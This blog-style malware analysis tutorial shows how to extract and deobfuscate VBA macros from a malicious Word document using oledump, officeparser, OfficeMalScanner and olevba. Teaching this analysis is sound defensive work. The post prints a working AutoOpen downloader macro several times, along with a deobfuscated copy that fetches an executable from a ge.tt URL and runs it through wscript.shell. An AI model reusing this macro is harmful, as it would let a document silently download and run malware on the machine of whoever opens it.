dfir it!

responding to incidents with candied bacon

Analyst’s Handbook - Analyzing Weaponized Documents

Weaponized documents (I really hate this name!) are just another method used by bad guys to deliver malicious payload. Recently this technique was used by criminal groups delivering banking trojans (e.g. Dridex), but as you might expect it was also used by APT actors (e.g. Rocket Kitten in Operation Woolen Goldfish). Regardless of the threat type (APT, commodity, etc.) analysis of the malicious documents should be an essential skill of every analyst.

Introduction

Nowadays Microsoft Office documents are a collections of XML files stored in a ZIP file. Historically storing multiple objects in one document was challenging for traditional file systems in terms of efficiency. In order to address this issue a structure called Microsoft Compound File Binary also known as Object Linking and Embedding (OLE) compound file was created. The structure defines files as hierarchical collection of two objects - storage and stream. Basically think of storage and a stream as directory and a file respectively.

Another objects that you might encounter in the OLE files are macros. Macros allow to automate tasks and add functionality to your documents like reports, forms, etc. Macros can use Visual Basic (VBA) which is where bad guys will often try to hide their malicious code. This is what we are after in this handbook - finding and extracting malicious code from OLE files!

Prerequisites

Process

Lenny Zeltser created an awesome cheat sheet for analyzing malicious documents. Generally it contains the following steps:

  1. Find malicious code
  2. Extract code
  3. Analyze code
  4. Extract host and network indicators

Malware Analysis

Analysis will be carried out in REMnux a free Linux Toolkit for Reverse-Engineering and Analyzing Malware. The easiest and quickest option is to download ova file and set up REMnux on a virtual machine. Keep in mind we will be analyzing malicious script so be sure to do it properly. I will not describe how to set up malware environment in this post however there are plenty of available resources here, here, here and here.

Sample

If you want to follow along with the examples you can grab the file from www.hybrid-analysis.com.

Analysis

Personally I like to start with a file command to get a better feeling of what am I dealing with.

1
2
3

remnux@remnux:~/Desktop/AnalystH$ file malware1.doc
malware1.doc: CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Raz0r, Revision Number: 198, Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Mon Jan 12 00:32:00 2015, Last Saved Time/Date: Wed May  6 04:22:00 2015, Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0

Output provides a lot of useful information including:

  • File format: CDF V2 Document
  • OS: Windows
  • Application: Microsoft Word
  • Author name: Raz0r
  • Last Saved Time/Date: Wed May 6 04:22:00 2015

Compound Document Format (CDF) as described in the introduction section contains multiple different objects.

Let’s take a closer look.

oledump.py

First we will examine file with oledump.py written and maintained by Didier Stevens.

1
2
3
4
5
6
7
8
9
10
11
12
13

remnux@remnux:~/Desktop/AnalystH$ oledump.py malware1.doc
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9602 '1Table'
  5:    137803 'Data'
  6:       539 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: M    5258 'Macros/VBA/NewMacros'
  9: m     938 'Macros/VBA/ThisDocument'
 10:      3483 'Macros/VBA/_VBA_PROJECT'
 11:       578 'Macros/VBA/dir'
 12:      4096 'WordDocument'

One of the cool things about oledump.py is its ability to mark streams that contain VBA code. In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):

1
2
3
4
5
6
7
8
9

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s9 -v malware1.doc
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.

Let’s dump it for later comparison with other tools.

1

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s9 -v malware1.doc > attribute_code

Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s8 -v  malware1.doc

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If

Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

It is safe to say we found our malicious code! We will dump the code for further analysis.

1

remnux@remnux:~/Desktop/AnalystH$ oledump.py -s8 -v  malware1.doc > malicious-code

Before we will delve into deobfuscation and code analysis let’s see how other tools cope with the same malicious file.

officeparser.py

officeparser.py by John William Davison prints similar information as oledump.py, however it does not help analysts with marking objects containing VBA code.

1
2
3
4
5
6
7
8
9
10
11
12
13

remnux@remnux:~/Desktop/AnalystH$ officeparser.py -t malware1.doc
1: Data
2: 1Table
3: WordDocument
4: SummaryInformation
5: DocumentSummaryInformation
8: ThisDocument
9: NewMacros
10: _VBA_PROJECT
11: dir
12: PROJECTwm
13: PROJECT
14: CompObj

Even though officeparser.py does not highlight object of interest, macros can still be extracted with the --extract-macros option:

1

remnux@remnux:~/Desktop/AnalystH$ officeparser.py --extract-macros malware1.doc

Each macro object found will be saved to a separate file:

1
2
3
4
5
6
7
8

remnux@remnux:~/Desktop/AnalystH$ ls -laS
total 204
drwxrwxr-x 2 remnux remnux   4096 2015-05-17 08:06 .
drwxrwxr-x 3 remnux remnux   4096 2015-05-11 15:18 ..
-rw-rw-r-- 1 remnux remnux   3819 2015-05-17 07:47 malicious-code
-rw-rw-r-- 1 remnux remnux   3819 2015-05-17 08:03 NewMacros.bas
-rw-rw-r-- 1 remnux remnux    285 2015-05-17 08:06 attribute_code
-rw-rw-r-- 1 remnux remnux    285 2015-05-17 08:03 ThisDocument.cls

officeparser.py dumped exactly the same content as oledump.py:

1
2
3
4
5

remnux@remnux:~/Desktop/AnalystH/part1$ md5sum * | sort -n
c598c45b0d9d3090599ff1df77c5d612  attribute_code
c598c45b0d9d3090599ff1df77c5d612  ThisDocument.cls
8789d66197b3bbf265b8ed339d2f06e7  malicious-code
8789d66197b3bbf265b8ed339d2f06e7  NewMacros.bas

OfficeMalScanner

OfficeMalScanner written by Frank Boldewin is less interactive but it automatically finds and extracts malicious code for further analysis. This is handy when we are interested in fast triage and code analysis only. OfficeMalScanner is not included in the newest REMnux v6.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

remnux@remnux:~/Desktop/AnalystH/part1$ OfficeMalScanner malware1.doc info

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+

[*] INFO mode selected
[*] Opening file malware1.doc
[*] Filesize is 176640 (0x2b200) Bytes
[*] Ms Office OLE2 Compound Format document detected

---------------------------------------
[Scanning for VB-code in MALWARE1.DOC]
---------------------------------------
NewMacros
ThisDocument
-----------------------------------------------------------------------------
                VB-MACRO CODE WAS FOUND INSIDE THIS FILE!
               The decompressed Macro code was stored here:

------> Z:\home\remnux\Desktop\AnalystH\part1\MALWARE1.DOC-Macros
----------------------------------------------------------------------------

Let’s check the files:

1
2
3

remnux@remnux:~/Desktop/AnalystH/part1/MALWARE1.DOC-Macros$ md5sum *
8789d66197b3bbf265b8ed339d2f06e7  NewMacros
76624a45e3d20ad3caeaa9d90d49dbbe  ThisDocument

OfficeMalScanner was able to extract the same streams. The file NewMacros containing malicious script is exactly the same as extracted by other tools, however the file ThisDocument has different MD5 hash. By checking the content (omitted for brevity) it seems to merge parts of code from both streams containing VBA, which might confuse some of the analysts.

olevba.py

olevba.py created by Decalage performs all the steps of the process including the basic analysis of the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

remnux@remnux:~/Desktop/AnalystH/part1$ olevba.py malware1.doc
olevba 0.27 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS---- malware1.doc

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: malware1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: malware1.doc - OLE stream: u'Macros/VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If

Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+---------------------------------------+
| Type       | Keyword            | Description                           |
+------------+--------------------+---------------------------------------+
| AutoExec   | AutoOpen           | Runs when the Word document is opened |
| Suspicious | CreateObject       | May create an OLE object              |
| Suspicious | Lib                | May run code from a DLL               |
| Suspicious | URLDownloadToFileA | May download files from the Internet  |
+------------+--------------------+---------------------------------------+

Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this bad boy!

Code deobfuscation

There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.

I like to rename variables so they start with capital letter informing me about the variable type, for instance:

  • S_var1 means this variable is of a String type.

This is how code looks like after initial clean up:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    S_var10 = S_var9 & S_var8 & ""
    S_var11 = S_var10
    S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
    S_var13 = S_var12
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set O_var1 = O_var1.exec(S_var12)
   End If
End Sub

Obfuscation seems to rely on string operations. Next step would be to perform all operations on String variables, for instance:

1
2
3

"a" + "b" == "ab"
"c" & "" == "c"
Split(LotsofFuckingStringinallinOne)(1) == "\"

After a few operations code becomes much more readable:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = "wscript."
    S_var7 = "SbieCtrl".exe"
    S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts"
    S_var9 = ""
    S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
      
   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject("wscript.shell")
   Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
   End If
End Sub

Code analysis summary:

  • AutoOpen() will be executed after the document is opened.
  • ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()
  • URLDownloadToFile() accepts five parameters, including URL address http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.
  • Both information serve as a network and host indicators that might be used to check for successful compromise.

Conclusions

It’s never a good option to rely on only one tool. Analyzing malicious documents is all about finding, extracting and analyzing malicious code. What would happen if bad guys used different obfuscation methods, document types or came up with new unknown technique? Would you be prepared with your current toolset? Having backup plan and additional tools in your toolset makes you ready for such scenario. In our short analysis OfficeMalScanner was not able to extract both streams correctly. What if this was your go to tool? Would you be able to perform analysis? I am not saying that any tool described in this post is better or worse than the other, all of them are great tools and allow you to do things differently it all really depends on your requirements. For instance officeparser.py and oledump.py allow you to interact with the file internals, however this might not be the most efficient approach if you have to analyze few documents where writing a while loop and using OfficeMalScanner or olevba.py to dump the malicious code will do the trick for you.

Never limit yourself to one tool, programming language or operating system. Be flexible and open-minded, have a backup plan, a proper toolset and you will be better prepared for the upcoming challenges!

Comments